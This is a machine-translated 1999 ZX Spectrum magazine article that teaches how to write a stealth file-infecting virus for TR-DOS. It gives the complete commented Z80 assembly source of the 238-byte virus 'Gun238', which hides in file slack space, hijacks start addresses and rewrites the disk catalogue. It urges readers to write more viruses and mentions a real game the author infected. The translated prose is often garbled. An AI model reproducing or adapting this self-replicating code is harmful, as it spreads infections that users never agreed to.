|
Deja Vu #09
13 ноября 1999 |
|
Coding - pishim virus invisible to TR-DOS.
(C) Arkady Gobuzov, 1999
__________________________________________
The first (?) Virus which has received some
distribution in TR-DOS and was first described
LIMITED in a computer magazine
incident particle was virus propagation
tranyaemy the game LAST
BATTLE.
Here I would like RASSC
show a new type of virus
ca, which infects not
BASIC, and CODE-files at
Moreover, the size of the files in
sectors, and the order of files on the disk
will not change. It so I called this type of virus -
"Invisible", although, in fairness, it must be noted on a PC
virus-invisible means something quite different.
First, let us recall how to construct file
system in TR-DOS: the files take up on
disk size, fold the size of one sector. Thus, both the files in
the 513 bytes, and files to 768 bytes, and the files of 600
bytes will be occupy on disk 3 sektora.Pri that only files up
to 768 bytes will be the most efficient use of disk space. All
the other files in the last sector will be some unused balance
in size from 1 to 255 bytes.
Question No. 1:
--------------
And can I record something in THIS
UNUSED BALANCE?
Apparently, it is possible, with a miracle!,
file size in sectors will not change.
Now let's think about what files
it makes sense to infect. Clearly, text files, infect files
with the font is meaningless. Only need to infect files that
immediately after loading the given control JUMP'om or CALL'om
at a starting address.
Question number 2:
--------------
HOW TO DETERMINE files, run software
START ADDRESS?
Of course, this will get
some part of file into memory, preferably
how can a smaller part. Practice shows that it is sufficient to
download just one sector. I've somehow accidentally discovered
that the files are packed with the most common packers to
Spectrume, namely: HRUST'om, HRUM'om and MS PACK'om and
unloaded from the packer, the start address always have the
following sequence of commands:
; DI
; LD (NN), SP
Knowing this, I can always get on the first sector of a file
or even easier - the first two byte defines the files that run
on start address. You can ask, but
the same as other files? Well, and other files
too, can somehow determine. For example, in
sequence:
; DI
; LD SP, NN
Screens, packed with a packer, it is possible
determine the sequence:
; CALL 82 (not necessarily located on
start address, and somewhere in the first sector.)
And so, the options are many, but keep in mind that the body
of the virus should be as can be smaller, so it's easier to
write a virus that infects only some specific executable files
rather than trying to write universal.
So: will continue to be described by a virus that infects
files that are packed most common packers, and have since from
the first location, the sequence Bytes:
; # F3 DI
; # ED # 73 # NN # NN LD (NN), SP
Question number 3:
--------------
FILES CAN BE ANY SIZE infects?
Since we will be positioned immediately adjacent
after the file, it is easy to calculate the address
from which we will be in memory
after downloading an infected file:
Address = Address of the virus file + length of the file.
It must be remembered that after downloading
we need to have enough room for 8
sectors of the directory, the first sector of interest to us
and file for a backup copy of the virus. Total 10 sectors or
2560 bytes. Recall that at the end of the memory address
65368 is a unit UDG, the schedule is determined
user. It is desirable to leave without
changes. Before this unit is
stack, BASIC being installed by default:
CLEAR 65367; this stack reaches the top down
to about 65,274 addresses (# FEFA). Consider a situation (quite
possible), when loader does not command CLEAR, and packaged
unit after loading a decompressed not riding straight on the
stack, then returned back to BASIC. In this case, the default
stack In no case can not overwrite. But, as
Typically, the loader sets a
low enough stack type 24575. And after
packaged unit has some sort of unused memory. As we explained
above, this memory should be no higher than 62,464 =
= # FE00 - # A00.
Once again I summarize:
Address of the virus body = Start address + 256 infected file *
file size in sectors that should be less than 62,465.
Question number 4:
--------------
WHAT IS THE GENERAL SCHEME OF INFECTION?
HOW DOES THE VIRUS?
In the infected file, the virus body is located immediately
after the file data.
Thus, the infected file is loaded, the
It is given to the management team of JP, CALL,
or RANDOMIZE USR start adres.Po start address is the team JP -
body virus. Further, we read directly from comments in the
assembler listing: , (The program is written in ZXASM3.0)
;---------; Gun238 - virus-invisible for TR-DOS
; (C) 1999 gun
LastTrackSectorStore EQU # FE00
starting from this address will be stored
Some variables
AdrCurFilSize EQU # FE02
SizeStore EQU # FE04
LastByte EQU # FE06
LowSize EQU # FE08
Reserv EQU # F400
stealth virus body:
;----------------- Begin LD HL, Begin; store
LD DE, Reserv; back
LD BC, 256; copy of the virus
LDIR
LD HL, (23796)
retain the current track, and sector
LD (LastTrackSectorStore), HL
EX DE, HL
PUSH HL; HL, # F500
LD D, L
LD E, L; DE, 0
LD BC, # 805; load
CALL 15635; directory
later in the cycle will take place on all
files in a directory, looking for a suitable
infection.
l2 POP HL
; HL-# F500, the downloaded directory.
JR loop
l1 LD BC, 3
l3 ADD HL, BC
loop LD A, (HL); reached the end
OR A; directory?
JR Z, endrut;
LD BC, 8; in HL - Address
ADD HL, BC; expansion
LD A, (HL)
CP "C"; if the file does not
JR NZ, l3; code, pass
; Next
INC HL
LD E, (HL); DE-start ADRES
INC HL;
LD D, (HL);
INC HL
In the infected file after working virus
management will be transferred to
start address +3, ie directly on the command
the next instruction after CALL NN
remember the address to which the stored
size of the current file
LD (AdrCurFilSize), HL
LD C, (HL);
INC HL; BC-size
LD B, (HL); file
INC HL
LD (SizeStore), BC
EX DE, HL
ADD HL, BC
LD (LastByte), HL
LD (Reserv +1), HL
; DE address end = start + size
EX DE, HL
LD A, D
CP # F4
check whether the file after downloading
enough memory for virus
if not, proceed to the next file
JR NC, l1
INC C
DEC C
JR Z, l4
INC B
l4 LD A, B
CP (HL); file size
; Sectors
file clearly has a false long, well his
JR NZ, l1
LD A, C
LSB size, 256 minus this
n = size of the balance.
LD (LowSize), A
CP (256-VirSize)
the right balance there, go to the next file
JR NC, l1
INC HL
LD E, (HL); the first sector and
INC HL; track of the current
LD D, (HL); file
INC HL
PUSH HL; address in the directory
; Next file
PUSH DE; the first sector and
; Track file
PUSH BC; B-volume sectors
LD HL, Reserv + # 900
LD BC, # 105
load the first sector of file:
CALL 15635
LD HL, (Reserv + # 901)
LD BC, # 73ED; LD (..), SP
XOR A
check whether the right place
we are interested in a sequence of bytes
SBC HL, BC
POP BC
POP DE
POP HL
file is not ours, we go to the next
JR NZ, loop
JR Continue
This transition is necessary in order to
on endrut could anywhere
, "Reach out" team JR
;------------- Arrive here, if that ran through
files and have not found anything suitable for
infection;
or after infection fayla.Pri startup
infected file can infect only
one file
endrut
LD HL, (LastTrackSectorStore)
LD (23796), HL
POP HL
LD (0), SP
StackS EQU $ -2
DI
of the virus body will not return
immediately to the bytes after the command CALL, a
conceding two bytes
INC HL
INC HL
JP (HL)
;---------------- Continue LD HL, (Reserv + # 903)
save the address to which to also cause
the file is a stack, the address store
a backup copy of the virus, which then
retain in the last sector of the infected
file.
LD (Reserv + StackS-Begin), HL
PUSH DE
PUSH BC
LD HL, Reserv + # 902
LD BC, (LastByte)
and in the first sector of the infected file
put the transition to an address following the
last byte, this address will
virus body
LD (HL), B
DEC HL
LD (HL), C
DEC HL
LD (HL), 205; CALL
PUSH HL; HL = Reserv + # 900
LD BC, # 106
CALL 15635
unloaded the first sector in its early
put a sequence of commands
; CALL VirusBody
; DB N, N
these last two bytes are missing
Xia and will never be satisfied
POP HL
POP BC; size in sects.
POP DE; first track and sector
DEC B
to the number of primary sector and a track
the infected file, we add its size
minus 1, then obtain the number of recent
sector and a track:
l5 INC DE
LD A, E
AND 15
JR NZ, l6
LD E, A
INC D
l6 DJNZ l5
; DE last sector infected file
PUSH DE
PUSH HL
LD BC, # 105
loads the last sector in the memory
CALL 15635
Last uploaded file sector
LD BC, virEnd-Begin
LD HL, (SizeStore)
ADD HL, BC
EX DE, HL
; DE how would the file size after
infection
LD HL, (AdrCurFilSize)
LD (HL), E; do
INC HL; changes
LD (HL), D; Directory
LD DE, (LowSize)
LD D, # FD
LD HL, Reserv
LDIR
POP HL
POP DE
LD BC, # 106
unloaded last modified
Sector
CALL 15635
LD HL, Reserv + # 100
LD D, L
LD E, L
LD BC, # 806
CALL 15635
JR endrut
virEnd
VirSize EQU virEnd-Begin
;---------------
Thus, the body of the virus has a size of 238 bytes. In my
opinion, difficult to reduce this number, without violating the
capacity of the virus ... Although, if you do a search and
replace another sequence of commands, not DI: LD (NN), SP, you
can benefit substantially. The first virus that uses this idea,
was written by me in the spring of 1995, its size was only 186
bytes, but it does not infect files from MS_PACKa, HRUSTa,
HRUMa (these programs were not yet was), and files uploaded
from ASC Screen Crasher'a, where there is a replacement team
CALL 82, CALL command the virus body.
Now the number of files that are actually
may be infected:
The files are unloaded from the above Packers have the same
chances and 0 and 100, and 255 bytes in the remainder, as they
say in probability theory - these outcomes are equally
probable, ie likely to be infected accidentally taken a file
that has we needed a sequence of bytes is equal to (256-length
of virus) / 256. This number can not be equal to unity, because
the virus body is always something should contain. For this
virus, this number slightly less than 1 / 14. That is, if the
disc contains 14 files, downloaded from HRUMa, HRUSTa or
MS_PACK, then, likely to infect only 1 file
if 28 - then 2, although there may be options that
You can not infect anything, or can infect all the files (very
unlikely). For virus that infects ASC files, this number
little more than 1 / 4.
Needless to say, the virus does not
any destructive actions and infection makes every effort to do
no harm.
Question number 5:
--------------
HOW LONG WILL LIVE THIS VIRUS?
He lived until you erase the infected
file. Every time the infected file, the virus will load the
zero track and seek the appropriate file. After infection
size of the file in the directory will be updated and the file
will not have balance. So way, his re-infection is possible. If
the disc does not contain the file, then after work we'll be
back as a virus nothing happened in the infected block. After
copying the infected file to another drive, and there he will
begin his insidious thing.
Question number 6:
--------------
WHAT HAPPENS IF THE DISC glue?
Bad will. When you try to infection, the virus will try to
dump data to disk glued, and the on-screen message will error.
To avoid this, we must to check for disk glued at
Moreover, the size of the virus have to be increased and
pass the mark of 255 bytes, and it is for viruses of this type
is not realistic.
Question number 7:
--------------
IS IT POSSIBLE TO WRITE A VIRUS OVER SIZE
255 bytes and, while not spoiling
No files?
You can, but at the same time, he will be able to infect
only the files that are located at the very end
catalog; any files on disk after himself, a remote file. Much
effort to make appropriate changes to the directory have
advanced spektrumista not be. Increasing the size will make more
audits and, accordingly, to infect a greater number of
executable files. You can also make some effects that are so
Slavia viruses on the PC.
Now the main thing:
Question number 8:
--------------
A nafig all these viruses NEED?
It's interesting, you will agree!? In addition,
All computers have a disk system,
have the virus. They are also available on AMIGe, and on the PC,
and on Macs. I believe that their absence in
TR-DOS was only temporary. The purpose of this stativospolnit
gap and identify the main direction virusostroitelstva in
TR-DOS. But I urge all who will try to
write a virus, do not lay in it
destructive properties, it is best to do some fun features in
them, without zeroing zero track after the 13th of infection or
delete files.
More viruses, good and different!
R.S. The application can find the game GIHERO.Osnovnoy block,
which is called "gic", infected gun238.
Send your comments or you can send to author
by email: gobuzov@yahoo.com
And come to me for http://speccy.da.ru
Other articles:
Similar articles:
В этот день... 7 May